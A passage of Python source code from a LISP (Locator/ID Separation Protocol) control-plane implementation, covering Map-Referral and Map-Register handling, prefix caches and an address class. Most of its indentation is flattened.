else "bad key-id {}".format(map_notify.key_id)
lprint(" Authentication {} for Map-Notify-Ack, {}".format( \
"succeeded" if auth_good else "failed", key_id))
if (auth_good == False): return
#endif
#
# Remove Map-Notify from retransmission queue.
#
if (map_notify.retransmit_timer): map_notify.retransmit_timer.cancel()
etr = source.print_address()
key = map_notify.nonce_key
if (lisp_map_notify_queue.has_key(key)):
map_notify = lisp_map_notify_queue.pop(key)
if (map_notify.retransmit_timer): map_notify.retransmit_timer.cancel()
lprint("Dequeue Map-Notify from retransmit queue, key is: {}". \
format(key))
else:
lprint("Map-Notify with nonce 0x{} queue entry not found for {}". \
format(map_notify.nonce_key, red(etr, False)))
#endif
return
#enddef
#
# lisp_map_referral_loop
#
# Check to see if the arrived Map-Referral EID-prefix is more-specific than
# the last one we received.
#
def lisp_map_referral_loop(mr, eid, group, action, s):
if (action not in (LISP_DDT_ACTION_NODE_REFERRAL,
LISP_DDT_ACTION_MS_REFERRAL)): return(False)
if (mr.last_cached_prefix[0] == None): return(False)
#
# Check group first, if any. Then EID-prefix as source if (S,G).
#
loop = False
if (group.is_null() == False):
loop = mr.last_cached_prefix[1].is_more_specific(group)
#endif
if (loop == False):
loop = mr.last_cached_prefix[0].is_more_specific(eid)
#endif
if (loop):
prefix_str = lisp_print_eid_tuple(eid, group)
cached_str = lisp_print_eid_tuple(mr.last_cached_prefix[0],
mr.last_cached_prefix[1])
lprint(("Map-Referral prefix {} from {} is not more-specific " + \
"than cached prefix {}").format(green(prefix_str, False), s,
cached_str))
#endif
return(loop)
#enddef
#
# lisp_process_map_referral
#
# This function processes a Map-Referral message by a Map-Resolver.
#
def lisp_process_map_referral(lisp_sockets, packet, source):
map_referral = lisp_map_referral()
packet = map_referral.decode(packet)
if (packet == None):
lprint("Could not decode Map-Referral packet")
return
#endif
map_referral.print_map_referral()
s = source.print_address()
nonce = map_referral.nonce
#
# Process each EID record in Map-Reply message.
#
for i in range(map_referral.record_count):
eid_record = lisp_eid_record()
packet = eid_record.decode(packet)
if (packet == None):
lprint("Could not decode EID-record in Map-Referral packet")
return
#endif
eid_record.print_record(" ", True)
#
# Check if we have an outstanding request for this Map-Referral reply.
#
key = str(nonce)
if (key not in lisp_ddt_map_requestQ):
lprint(("Map-Referral nonce 0x{} from {} not found in " + \
"Map-Request queue, EID-record ignored").format( \
lisp_hex_string(nonce), s))
continue
#endif
mr = lisp_ddt_map_requestQ[key]
if (mr == None):
lprint(("No Map-Request queue entry found for Map-Referral " +
"nonce 0x{} from {}, EID-record ignored").format( \
lisp_hex_string(nonce), s))
continue
#endif
#
# Check for Map-Referral looping. If there is no loop cache the EID
# returned from the Map-Referral in the Map-Request queue entry.
#
if (lisp_map_referral_loop(mr, eid_record.eid, eid_record.group,
eid_record.action, s)):
mr.dequeue_map_request()
continue
#endif
mr.last_cached_prefix[0] = eid_record.eid
mr.last_cached_prefix[1] = eid_record.group
#
# Lookup referral in referral-cache.
#
add_or_replace = False
referral = lisp_referral_cache_lookup(eid_record.eid, eid_record.group,
True)
if (referral == None):
add_or_replace = True
referral = lisp_referral()
referral.eid = eid_record.eid
referral.group = eid_record.group
if (eid_record.ddt_incomplete == False): referral.add_cache()
elif (referral.referral_source.not_set()):
lprint("Do not replace static referral entry {}".format( \
green(referral.print_eid_tuple(), False)))
mr.dequeue_map_request()
continue
#endif
action = eid_record.action
referral.referral_source = source
referral.referral_type = action
ttl = eid_record.store_ttl()
referral.referral_ttl = ttl
referral.expires = lisp_set_timestamp(ttl)
#
# Mark locator up if the Map-Referral source is in the referral-set.
#
negative = referral.is_referral_negative()
if (referral.referral_set.has_key(s)):
ref_node = referral.referral_set[s]
if (ref_node.updown == False and negative == False):
ref_node.updown = True
lprint("Change up/down status for referral-node {} to up". \
format(s))
elif (ref_node.updown == True and negative == True):
ref_node.updown = False
lprint(("Change up/down status for referral-node {} " + \
"to down, received negative referral").format(s))
#endif
#endif
#
        # Set dirty-bit so we can remove referral-nodes from the cached entry
        # that weren't in the packet.
#
dirty_set = {}
for key in referral.referral_set: dirty_set[key] = None
#
# Process each referral RLOC-record in EID record.
#
for i in range(eid_record.rloc_count):
rloc_record = lisp_rloc_record()
packet = rloc_record.decode(packet, None)
if (packet == None):
lprint("Could not decode RLOC-record in Map-Referral packet")
return
#endif
rloc_record.print_record(" ")
#
# Copy over existing referral-node
#
addr_str = rloc_record.rloc.print_address()
if (referral.referral_set.has_key(addr_str) == False):
ref_node = lisp_referral_node()
ref_node.referral_address.copy_address(rloc_record.rloc)
referral.referral_set[addr_str] = ref_node
if (s == addr_str and negative): ref_node.updown = False
else:
ref_node = referral.referral_set[addr_str]
if (dirty_set.has_key(addr_str)): dirty_set.pop(addr_str)
#endif
ref_node.priority = rloc_record.priority
ref_node.weight = rloc_record.weight
#endfor
#
# Now remove dirty referral-node entries.
#
for key in dirty_set: referral.referral_set.pop(key)
eid_str = referral.print_eid_tuple()
if (add_or_replace):
if (eid_record.ddt_incomplete):
lprint("Suppress add {} to referral-cache".format( \
green(eid_str, False)))
else:
lprint("Add {}, referral-count {} to referral-cache".format( \
green(eid_str, False), eid_record.rloc_count))
#endif
else:
lprint("Replace {}, referral-count: {} in referral-cache".format( \
green(eid_str, False), eid_record.rloc_count))
#endif
#
# Process actions.
#
if (action == LISP_DDT_ACTION_DELEGATION_HOLE):
lisp_send_negative_map_reply(mr.lisp_sockets, referral.eid,
referral.group, mr.nonce, mr.itr, mr.sport, 15, None, False)
mr.dequeue_map_request()
#endif
if (action == LISP_DDT_ACTION_NOT_AUTH):
if (mr.tried_root):
lisp_send_negative_map_reply(mr.lisp_sockets, referral.eid,
referral.group, mr.nonce, mr.itr, mr.sport, 0, None, False)
mr.dequeue_map_request()
else:
lisp_send_ddt_map_request(mr, True)
#endif
#endif
if (action == LISP_DDT_ACTION_MS_NOT_REG):
if (referral.referral_set.has_key(s)):
ref_node = referral.referral_set[s]
ref_node.updown = False
#endif
if (len(referral.referral_set) == 0):
mr.dequeue_map_request()
else:
lisp_send_ddt_map_request(mr, False)
#endif
#endif
if (action in (LISP_DDT_ACTION_NODE_REFERRAL,
LISP_DDT_ACTION_MS_REFERRAL)):
if (mr.eid.is_exact_match(eid_record.eid)):
if (not mr.tried_root):
lisp_send_ddt_map_request(mr, True)
else:
lisp_send_negative_map_reply(mr.lisp_sockets,
referral.eid, referral.group, mr.nonce, mr.itr,
mr.sport, 15, None, False)
mr.dequeue_map_request()
#endif
else:
lisp_send_ddt_map_request(mr, False)
#endif
#endif
if (action == LISP_DDT_ACTION_MS_ACK): mr.dequeue_map_request()
#endfor
return
#enddef
#
# lisp_process_ecm
#
# Process a received Encapsulated-Control-Message. It is assumed for right now
# that all ECMs have a Map-Request embedded.
#
def lisp_process_ecm(lisp_sockets, packet, source, ecm_port):
ecm = lisp_ecm(0)
packet = ecm.decode(packet)
if (packet == None):
lprint("Could not decode ECM packet")
return
#endif
ecm.print_ecm()
header = lisp_control_header()
if (header.decode(packet) == None):
lprint("Could not decode control header")
return
#endif
packet_type = header.type
del(header)
if (packet_type != LISP_MAP_REQUEST):
lprint("Received ECM without Map-Request inside")
return
#endif
#
# Process Map-Request.
#
mr_port = ecm.udp_sport
lisp_process_map_request(lisp_sockets, packet, source, ecm_port,
ecm.source, mr_port, ecm.ddt, -1)
return
#enddef
#------------------------------------------------------------------------------
#
# lisp_send_map_register
#
# Compute authentication for a Map-Register message and send it to the
# supplied Map-Server.
#
def lisp_send_map_register(lisp_sockets, packet, map_register, ms):
#
    # If we are doing LISP-Decent and have a multicast group configured as
    # a Map-Server, we can't join the group by sending to it, so we have to
    # send to the loopback address to bootstrap our membership. We join via
    # one other member of the peer-group so we can get the group membership.
#
dest = ms.map_server
if (lisp_decent_push_configured and dest.is_multicast_address() and
(ms.map_registers_multicast_sent == 1 or ms.map_registers_sent == 1)):
dest = copy.deepcopy(dest)
dest.address = 0x7f000001
b = bold("Bootstrap", False)
g = ms.map_server.print_address_no_iid()
lprint("{} mapping system for peer-group {}".format(b, g))
#endif
#
# Modify authentication hash in Map-Register message if supplied when
# lisp_map_register() was called.
#
packet = lisp_compute_auth(packet, map_register, ms.password)
#
# Should we encrypt the Map-Register? Use 16-byte key which is
# 32 string characters.
#
if (ms.ekey != None):
ekey = ms.ekey.zfill(32)
iv = "0" * 8
ciphertext = chacha.ChaCha(ekey, iv).encrypt(packet[4::])
packet = packet[0:4] + ciphertext
e = bold("Encrypt", False)
lprint("{} Map-Register with key-id {}".format(e, ms.ekey_id))
#endif
decent = ""
if (lisp_decent_pull_xtr_configured()):
decent = ", decent-index {}".format(bold(ms.dns_name, False))
#endif
lprint("Send Map-Register to map-server {}{}{}".format( \
dest.print_address(), ", ms-name '{}'".format(ms.ms_name), decent))
lisp_send(lisp_sockets, dest, LISP_CTRL_PORT, packet)
return
#enddef
#
# lisp_send_ipc_to_core
#
# Send a LISP control packet that is to be sourced from UDP port 4342 to the
# lisp-core process.
#
def lisp_send_ipc_to_core(lisp_socket, packet, dest, port):
source = lisp_socket.getsockname()
dest = dest.print_address_no_iid()
lprint("Send IPC {} bytes to {} {}, control-packet: {}".format( \
len(packet), dest, port, lisp_format_packet(packet)))
packet = lisp_control_packet_ipc(packet, source, dest, port)
lisp_ipc(packet, lisp_socket, "lisp-core-pkt")
return
#enddef
#
# lisp_send_map_reply
#
# Send Map-Reply message to supplied destination. Note the destination must
# be routable in RLOC space.
#
def lisp_send_map_reply(lisp_sockets, packet, dest, port):
lprint("Send Map-Reply to {}".format(dest.print_address_no_iid()))
lisp_send_ipc_to_core(lisp_sockets[2], packet, dest, port)
return
#enddef
#
# lisp_send_map_referral
#
# Send Map-Referral message to supplied destination. Note the destination must
# be routable in RLOC space.
#
def lisp_send_map_referral(lisp_sockets, packet, dest, port):
lprint("Send Map-Referral to {}".format(dest.print_address()))
lisp_send_ipc_to_core(lisp_sockets[2], packet, dest, port)
return
#enddef
#
# lisp_send_map_notify
#
# Send Map-Notify message to supplied destination. Note the destination must
# be routable in RLOC space.
#
def lisp_send_map_notify(lisp_sockets, packet, dest, port):
lprint("Send Map-Notify to xTR {}".format(dest.print_address()))
lisp_send_ipc_to_core(lisp_sockets[2], packet, dest, port)
return
#enddef
#
# lisp_send_ecm
#
# Send Encapsulated Control Message.
#
def lisp_send_ecm(lisp_sockets, packet, inner_source, inner_sport, inner_dest,
outer_dest, to_etr=False, to_ms=False, ddt=False):
if (inner_source == None or inner_source.is_null()):
inner_source = inner_dest
#endif
#
    # For sending Map-Requests, if NAT-traversal is configured, use the same
    # socket used to send the Info-Request.
#
if (lisp_nat_traversal):
sport = lisp_get_any_translated_port()
if (sport != None): inner_sport = sport
#endif
ecm = lisp_ecm(inner_sport)
ecm.to_etr = to_etr if lisp_is_running("lisp-etr") else False
ecm.to_ms = to_ms if lisp_is_running("lisp-ms") else False
ecm.ddt = ddt
ecm_packet = ecm.encode(packet, inner_source, inner_dest)
if (ecm_packet == None):
lprint("Could not encode ECM message")
return
#endif
ecm.print_ecm()
packet = ecm_packet + packet
addr_str = outer_dest.print_address_no_iid()
lprint("Send Encapsulated-Control-Message to {}".format(addr_str))
dest = lisp_convert_4to6(addr_str)
lisp_send(lisp_sockets, dest, LISP_CTRL_PORT, packet)
return
#enddef
#------------------------------------------------------------------------------
#
# Below are constant definitions used for internal data structures.
#
LISP_AFI_GEO_COORD = -3
LISP_AFI_IID_RANGE = -2
LISP_AFI_ULTIMATE_ROOT = -1
LISP_AFI_NONE = 0
LISP_AFI_IPV4 = 1
LISP_AFI_IPV6 = 2
LISP_AFI_MAC = 6
LISP_AFI_E164 = 8
LISP_AFI_NAME = 17
LISP_AFI_LCAF = 16387
LISP_RLOC_UNKNOWN_STATE = 0
LISP_RLOC_UP_STATE = 1
LISP_RLOC_DOWN_STATE = 2
LISP_RLOC_UNREACH_STATE = 3
LISP_RLOC_NO_ECHOED_NONCE_STATE = 4
LISP_RLOC_ADMIN_DOWN_STATE = 5
LISP_AUTH_NONE = 0
LISP_AUTH_MD5 = 1
LISP_AUTH_SHA1 = 2
LISP_AUTH_SHA2 = 3
#------------------------------------------------------------------------------
#
# This is a general address format for EIDs, RLOCs, EID-prefixes in any AFI or
# LCAF format.
#
LISP_IPV4_HOST_MASK_LEN = 32
LISP_IPV6_HOST_MASK_LEN = 128
LISP_MAC_HOST_MASK_LEN = 48
LISP_E164_HOST_MASK_LEN = 60
#
# byte_swap_64
#
# Byte-swap a 64-bit number.
#
def byte_swap_64(address):
addr = \
((address & 0x00000000000000ff) << 56) | \
((address & 0x000000000000ff00) << 40) | \
((address & 0x0000000000ff0000) << 24) | \
((address & 0x00000000ff000000) << 8) | \
((address & 0x000000ff00000000) >> 8) | \
((address & 0x0000ff0000000000) >> 24) | \
((address & 0x00ff000000000000) >> 40) | \
((address & 0xff00000000000000) >> 56)
return(addr)
#enddef
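#
# Worked example:
#
#   byte_swap_64(0x0102030405060708) -> 0x0807060504030201
#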
#
# lisp_cache is a data structure to implement a multi-way tree. The first
# level array is an associative array of mask-lengths. Then each mask-length
# entry will be an associatative array of the following key:
#
# <32-bit-instance-id> <16-bit-address-family> <eid-prefix>
#
# Data structure:
# self.cache{}
# self.cache_sorted[]
# self.cache{}.entries{}
# self.cache{}.entries_sorted[]
#
class lisp_cache_entries():
def __init__(self):
self.entries = {}
self.entries_sorted = []
#enddef
#endclass
class lisp_cache():
def __init__(self):
self.cache = {}
self.cache_sorted = []
self.cache_count = 0
#enddef
def cache_size(self):
return(self.cache_count)
#enddef
def build_key(self, prefix):
if (prefix.afi == LISP_AFI_ULTIMATE_ROOT):
ml = 0
elif (prefix.afi == LISP_AFI_IID_RANGE):
ml = prefix.mask_len
else:
ml = prefix.mask_len + 48
#endif
iid = lisp_hex_string(prefix.instance_id).zfill(8)
afi = lisp_hex_string(prefix.afi).zfill(4)
if (prefix.afi > 0):
if (prefix.is_binary()):
length = prefix.addr_length() * 2
addr = lisp_hex_string(prefix.address).zfill(length)
else:
addr = prefix.address
#endif
elif (prefix.afi == LISP_AFI_GEO_COORD):
afi = "8003"
addr = prefix.address.print_geo()
else:
afi = ""
addr = ""
#endif
key = iid + afi + addr
return([ml, key])
#enddef
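    #
    # Key layout sketch for build_key() above (hypothetical prefix): IPv4
    # prefix 10.0.0.0/8 in instance-ID 0 hashes under mask-length bucket
    # 8 + 48 = 56 with key "00000000" + "0001" + "0a000000" (zero-filled
    # instance-ID, AFI, then address).
    #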
def add_cache(self, prefix, entry):
if (prefix.is_binary()): prefix.zero_host_bits()
ml, key = self.build_key(prefix)
if (self.cache.has_key(ml) == False):
self.cache[ml] = lisp_cache_entries()
self.cache[ml].entries = {}
self.cache[ml].entries_sorted = []
self.cache_sorted = sorted(self.cache)
#endif
if (self.cache[ml].entries.has_key(key) == False):
self.cache_count += 1
#endif
self.cache[ml].entries[key] = entry
self.cache[ml].entries_sorted = sorted(self.cache[ml].entries)
#enddef
def lookup_cache(self, prefix, exact):
ml_key, key = self.build_key(prefix)
if (exact):
if (self.cache.has_key(ml_key) == False): return(None)
if (self.cache[ml_key].entries.has_key(key) == False): return(None)
return(self.cache[ml_key].entries[key])
#endif
found = None
for ml in self.cache_sorted:
if (ml_key < ml): return(found)
for entry_key in self.cache[ml].entries_sorted:
entries = self.cache[ml].entries
if (entry_key in entries):
entry = entries[entry_key]
if (entry == None): continue
if (prefix.is_more_specific(entry.eid)): found = entry
#endif
#endfor
#endfor
return(found)
#enddef
def delete_cache(self, prefix):
ml, key = self.build_key(prefix)
if (self.cache.has_key(ml) == False): return
if (self.cache[ml].entries.has_key(key) == False): return
self.cache[ml].entries.pop(key)
self.cache[ml].entries_sorted.remove(key)
self.cache_count -= 1
#enddef
def walk_cache(self, function, parms):
for ml in self.cache_sorted:
for key in self.cache[ml].entries_sorted:
entry = self.cache[ml].entries[key]
status, parms = function(entry, parms)
if (status == False): return(parms)
#endfor
#endfor
return(parms)
#enddef
def print_cache(self):
lprint("Printing contents of {}: ".format(self))
if (self.cache_size() == 0):
lprint(" Cache is empty")
return
#endif
for ml in self.cache_sorted:
for key in self.cache[ml].entries_sorted:
entry = self.cache[ml].entries[key]
lprint(" Mask-length: {}, key: {}, entry: {}".format(ml, key,
entry))
#endfor
#endfor
#enddef
#endclass
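#
# A minimal usage sketch (hypothetical values). Entries stored for
# longest-match lookups are expected to have an "eid" attribute, since
# lookup_cache() calls prefix.is_more_specific(entry.eid):
#
#   cache = lisp_cache()
#   eid = lisp_address(LISP_AFI_IPV4, "", 0, 1000)
#   eid.store_prefix("[1000]10.0.0.0/8")
#   cache.add_cache(eid, entry)                # entry is caller-defined
#
#   host = lisp_address(LISP_AFI_IPV4, "10.1.1.1", 32, 1000)
#   entry = cache.lookup_cache(host, False)    # longest match
#   entry = cache.lookup_cache(eid, True)      # exact match
#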
#
# Caches.
#
lisp_referral_cache = lisp_cache()
lisp_ddt_cache = lisp_cache()
lisp_sites_by_eid = lisp_cache()
lisp_map_cache = lisp_cache()
lisp_db_for_lookups = lisp_cache() # Elements are class lisp_mapping()
#
# lisp_map_cache_lookup
#
# Do hierarchical lookup in the lisp_map_cache lisp_cache(). This is used
# by the ITR and RTR data-planes.
#
def lisp_map_cache_lookup(source, dest):
multicast = dest.is_multicast_address()
#
# Look up destination in map-cache.
#
mc = lisp_map_cache.lookup_cache(dest, False)
if (mc == None):
eid_str = source.print_sg(dest) if multicast else dest.print_address()
eid_str = green(eid_str, False)
dprint("Lookup for EID {} not found in map-cache".format(eid_str))
return(None)
#endif
#
# Unicast lookup succeeded.
#
if (multicast == False):
m = green(mc.eid.print_prefix(), False)
dprint("Lookup for EID {} found map-cache entry {}".format( \
green(dest.print_address(), False), m))
return(mc)
#endif
#
# If destination is multicast, then do source lookup.
#
mc = mc.lookup_source_cache(source, False)
if (mc == None):
eid_str = source.print_sg(dest)
dprint("Lookup for EID {} not found in map-cache".format(eid_str))
return(None)
#endif
#
# Multicast lookup succeeded.
#
m = green(mc.print_eid_tuple(), False)
dprint("Lookup for EID {} found map-cache entry {}".format( \
green(source.print_sg(dest), False), m))
return(mc)
#enddef
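#
# For example (hypothetical addresses): a lookup for a packet from
# [1000]10.1.1.1 to [1000]224.1.1.1 first matches the group entry for
# 224.1.1.1 (or a covering group prefix), then looks up 10.1.1.1 in that
# entry's source cache, and returns the (S,G) entry only when both
# stages match.
#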
#
# lisp_referral_cache_lookup
#
# Do hierarchical lookup in the lisp_referral_cache lisp_cache().
#
def lisp_referral_cache_lookup(eid, group, exact):
if (group and group.is_null()):
ref = lisp_referral_cache.lookup_cache(eid, exact)
return(ref)
#endif
#
# No source to do 2-stage lookup, return None.
#
if (eid == None or eid.is_null()): return(None)
#
# Do 2-stage lookup, first on group and within its structure for source.
# If we found both entries, return source entry. If we didn't find source
# entry, then return group entry if longest match requested.
#
ref = lisp_referral_cache.lookup_cache(group, exact)
if (ref == None): return(None)
sref = ref.lookup_source_cache(eid, exact)
if (sref): return(sref)
if (exact): ref = None
return(ref)
#enddef
#
# lisp_ddt_cache_lookup
#
# Do hierarchical lookup in the lisp_ddt_cache lisp_cache().
#
def lisp_ddt_cache_lookup(eid, group, exact):
if (group.is_null()):
ddt = lisp_ddt_cache.lookup_cache(eid, exact)
return(ddt)
#endif
#
# No source to do 2-stage lookup, return None.
#
if (eid.is_null()): return(None)
#
# Do 2-stage lookup, first on group and within its structure for source.
# If we found both entries, return source entry. If we didn't find source
# entry, then return group entry if longest match requested.
#
ddt = lisp_ddt_cache.lookup_cache(group, exact)
if (ddt == None): return(None)
sddt = ddt.lookup_source_cache(eid, exact)
if (sddt): return(sddt)
if (exact): ddt = None
return(ddt)
#enddef
#
# lisp_site_eid_lookup
#
# Do hierarchical lookup in the lisp_sites_by_eid lisp_cache().
#
def lisp_site_eid_lookup(eid, group, exact):
if (group.is_null()):
site_eid = lisp_sites_by_eid.lookup_cache(eid, exact)
return(site_eid)
#endif
#
# No source to do 2-stage lookup, return None.
#
if (eid.is_null()): return(None)
#
# Do 2-stage lookup, first on group and within its structure for source.
# If we found both entries, return source entry. If we didn't find source
# entry, then return group entry if longest match requested.
#
site_eid = lisp_sites_by_eid.lookup_cache(group, exact)
if (site_eid == None): return(None)
#
# There is a special case we have to deal with here. If there exists a
# (0.0.0.0/0, 224.0.0.0/4) entry that has been configured with accept-
# more-specifics, this entry will not be returned if a more-specific
# entry is already cached. For instance, if a Map-Register was received
# for (1.1.1.1/32, 224.1.1.1/32), it will match the (0.0.0.0/0,
# 224.0.0.0/4) entry. But when (1.1.1.1/32, 224.1.1.1/32) is cached and
# a Map-Register is received for (2.2.2.2/32, 224.1.1.1/32), rather than
# matching the ams entry, it will match the more-specific entry and
# return (*, 224.1.1.1/32). Since the source lookup performed below will
# not find 2.2.2.2, what is returned is 224.1.1.1/32 and not 224.0.0.0/4.
#
# So we look at the returned entry and, if a source is not found, we
# check whether the parent of the 224.1.1.1/32 entry matches the group
# we are looking up. This, of course, is only done for longest-match
# lookups.
#
seid = site_eid.lookup_source_cache(eid, exact)
if (seid): return(seid)
if (exact):
site_eid = None
else:
parent = site_eid.parent_for_more_specifics
if (parent and parent.accept_more_specifics):
if (group.is_more_specific(parent.group)): site_eid = parent
#endif
#endif
return(site_eid)
#enddef
#
# LISP Address encodings. Both in AFI formats and LCAF formats.
#
# Here is an EID encoded in:
#
# Instance ID LISP Canonical Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 2 | IID mask-len | 4 + n |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Instance ID |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# There is a Python peculiarity with shifting greater than 120 bits to
# the left: if the high-order bit hits bit 127, it shifts another 8 bits,
# which causes IPv6 addresses to lose their high-order byte. So note the
# check for shift >= 120 below.
#
class lisp_address():
def __init__(self, afi, addr_str, mask_len, iid):
self.afi = afi
self.mask_len = mask_len
self.instance_id = iid
self.iid_list = []
self.address = 0
if (addr_str != ""): self.store_address(addr_str)
#enddef
def copy_address(self, addr):
if (addr == None): return
self.afi = addr.afi
self.address = addr.address
self.mask_len = addr.mask_len
self.instance_id = addr.instance_id
self.iid_list = addr.iid_list
#enddef
def make_default_route(self, addr):
self.afi = addr.afi
self.instance_id = addr.instance_id
self.mask_len = 0
self.address = 0
#enddef
def make_default_multicast_route(self, addr):
self.afi = addr.afi
self.instance_id = addr.instance_id
if (self.afi == LISP_AFI_IPV4):
self.address = 0xe0000000
self.mask_len = 4
#endif
if (self.afi == LISP_AFI_IPV6):
self.address = 0xff << 120
self.mask_len = 8
#endif
if (self.afi == LISP_AFI_MAC):
self.address = 0xffffffffffff
self.mask_len = 48
#endif
#enddef
def not_set(self):
return(self.afi == LISP_AFI_NONE)
#enddef
def is_private_address(self):
if (self.is_ipv4() == False): return(False)
addr = self.address
if (((addr & 0xff000000) >> 24) == 10): return(True)
if (((addr & 0xff000000) >> 24) == 172):
byte2 = (addr & 0x00ff0000) >> 16
if (byte2 >= 16 and byte2 <= 31): return(True)
#endif
if (((addr & 0xffff0000) >> 16) == 0xc0a8): return(True)
return(False)
#enddef
def is_multicast_address(self):
if (self.is_ipv4()): return(self.is_ipv4_multicast())
if (self.is_ipv6()): return(self.is_ipv6_multicast())
if (self.is_mac()): return(self.is_mac_multicast())
return(False)
#enddef
def host_mask_len(self):
if (self.afi == LISP_AFI_IPV4): return(LISP_IPV4_HOST_MASK_LEN)
if (self.afi == LISP_AFI_IPV6): return(LISP_IPV6_HOST_MASK_LEN)
if (self.afi == LISP_AFI_MAC): return(LISP_MAC_HOST_MASK_LEN)
if (self.afi == LISP_AFI_E164): return(LISP_E164_HOST_MASK_LEN)
if (self.afi == LISP_AFI_NAME): return(len(self.address) * 8)
if (self.afi == LISP_AFI_GEO_COORD):
return(len(self.address.print_geo()) * 8)
#endif
return(0)
#enddef
def is_iana_eid(self):
if (self.is_ipv6() == False): return(False)
addr = self.address >> 96
return(addr == 0x20010005)
#enddef
def addr_length(self):
if (self.afi == LISP_AFI_IPV4): return(4)
if (self.afi == LISP_AFI_IPV6): return(16)
if (self.afi == LISP_AFI_MAC): return(6)
if (self.afi == LISP_AFI_E164): return(8)
if (self.afi == LISP_AFI_LCAF): return(0)
if (self.afi == LISP_AFI_NAME): return(len(self.address) + 1)
if (self.afi == LISP_AFI_IID_RANGE): return(4)
if (self.afi == LISP_AFI_GEO_COORD):
return(len(self.address.print_geo()))
#endif
return(0)
#enddef
def afi_to_version(self):
if (self.afi == LISP_AFI_IPV4): return(4)
if (self.afi == LISP_AFI_IPV6): return(6)
return(0)
#enddef
def packet_format(self):
#
# Note that "I" is used to produce 4 bytes; when "L" was used,
# struct.pack() produced 8 bytes (the native size of unsigned long).
#
if (self.afi == LISP_AFI_IPV4): return("I")
if (self.afi == LISP_AFI_IPV6): return("QQ")
if (self.afi == LISP_AFI_MAC): return("HHH")
if (self.afi == LISP_AFI_E164): return("II")
if (self.afi == LISP_AFI_LCAF): return("I")
return("")
#enddef
def pack_address(self):
packet_format = self.packet_format()
packet = ""
if (self.is_ipv4()):
packet = struct.pack(packet_format, socket.htonl(self.address))
elif (self.is_ipv6()):
addr1 = byte_swap_64(self.address >> 64)
addr2 = byte_swap_64(self.address & 0xffffffffffffffff)
packet = struct.pack(packet_format, addr1, addr2)
elif (self.is_mac()):
addr = self.address
addr1 = (addr >> 32) & 0xffff
addr2 = (addr >> 16) & 0xffff
addr3 = addr & 0xffff
packet = struct.pack(packet_format, addr1, addr2, addr3)
elif (self.is_e164()):
addr = self.address
addr1 = (addr >> 32) & 0xffffffff
addr2 = (addr & 0xffffffff)
packet = struct.pack(packet_format, addr1, addr2)
elif (self.is_dist_name()):
packet += self.address + "\0"
#endif
return(packet)
#enddef
def unpack_address(self, packet):
packet_format = self.packet_format()
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
addr = struct.unpack(packet_format, packet[:format_size])
if (self.is_ipv4()):
self.address = socket.ntohl(addr[0])
elif (self.is_ipv6()):
#
# Sigh, we have a high-order byte zero-fill issue when parsing
# a binary IPv6 address from a packet. If the address starts
# with fe::, then only the low-order byte of addr[0] is
# significant and byte-swapping is not necessary (or we would
# make the high-order 16 bits 00fe). Sigh.
#
if (addr[0] <= 0xffff and (addr[0] & 0xff) == 0):
high = (addr[0] << 48) << 64
else:
high = byte_swap_64(addr[0]) << 64
#endif
low = byte_swap_64(addr[1])
self.address = high | low
elif (self.is_mac()):
short1 = addr[0]
short2 = addr[1]
short3 = addr[2]
self.address = (short1 << 32) + (short2 << 16) + short3
elif (self.is_e164()):
self.address = (addr[0] << 32) + addr[1]
elif (self.is_dist_name()):
packet, self.address = lisp_decode_dist_name(packet)
self.mask_len = len(self.address) * 8
format_size = 0
#endif
packet = packet[format_size::]
return(packet)
#enddef
def is_ipv4(self):
return(True if (self.afi == LISP_AFI_IPV4) else False)
#enddef
def is_ipv4_link_local(self):
if (self.is_ipv4() == False): return(False)
return(((self.address >> 16) & 0xffff) == 0xa9fe)
#enddef
def is_ipv4_loopback(self):
if (self.is_ipv4() == False): return(False)
return(self.address == 0x7f000001)
#enddef
def is_ipv4_multicast(self):
if (self.is_ipv4() == False): return(False)
return(((self.address >> 24) & 0xf0) == 0xe0)
#enddef
def is_ipv4_string(self, addr_str):
return(addr_str.find(".") != -1)
#enddef
def is_ipv6(self):
return(True if (self.afi == LISP_AFI_IPV6) else False)
#enddef
def is_ipv6_link_local(self):
if (self.is_ipv6() == False): return(False)
return(((self.address >> 112) & 0xffff) == 0xfe80)
#enddef
def is_ipv6_string_link_local(self, addr_str):
return(addr_str.find("fe80::") != -1)
#enddef
def is_ipv6_loopback(self):
if (self.is_ipv6() == False): return(False)
return(self.address == 1)
#enddef
def is_ipv6_multicast(self):
if (self.is_ipv6() == False): return(False)
return(((self.address >> 120) & 0xff) == 0xff)
#enddef
def is_ipv6_string(self, addr_str):
return(addr_str.find(":") != -1)
#enddef
def is_mac(self):
return(True if (self.afi == LISP_AFI_MAC) else False)
#enddef
def is_mac_multicast(self):
if (self.is_mac() == False): return(False)
return((self.address & 0x010000000000) != 0)
#enddef
def is_mac_broadcast(self):
if (self.is_mac() == False): return(False)
return(self.address == 0xffffffffffff)
#enddef
def is_mac_string(self, addr_str):
return(len(addr_str) == 15 and addr_str.find("-") != -1)
#enddef
def is_link_local_multicast(self):
if (self.is_ipv4()):
return((0xe0ffff00 & self.address) == 0xe0000000)
#endif
if (self.is_ipv6()):
return((self.address >> 112) & 0xffff == 0xff02)
#endif
return(False)
#enddef
def is_null(self):
return(True if (self.afi == LISP_AFI_NONE) else False)
#enddef
def is_ultimate_root(self):
return(True if self.afi == LISP_AFI_ULTIMATE_ROOT else False)
#enddef
def is_iid_range(self):
return(True if self.afi == LISP_AFI_IID_RANGE else False)
#enddef
def is_e164(self):
return(True if (self.afi == LISP_AFI_E164) else False)
#enddef
def is_dist_name(self):
return(True if (self.afi == LISP_AFI_NAME) else False)
#enddef
def is_geo_prefix(self):
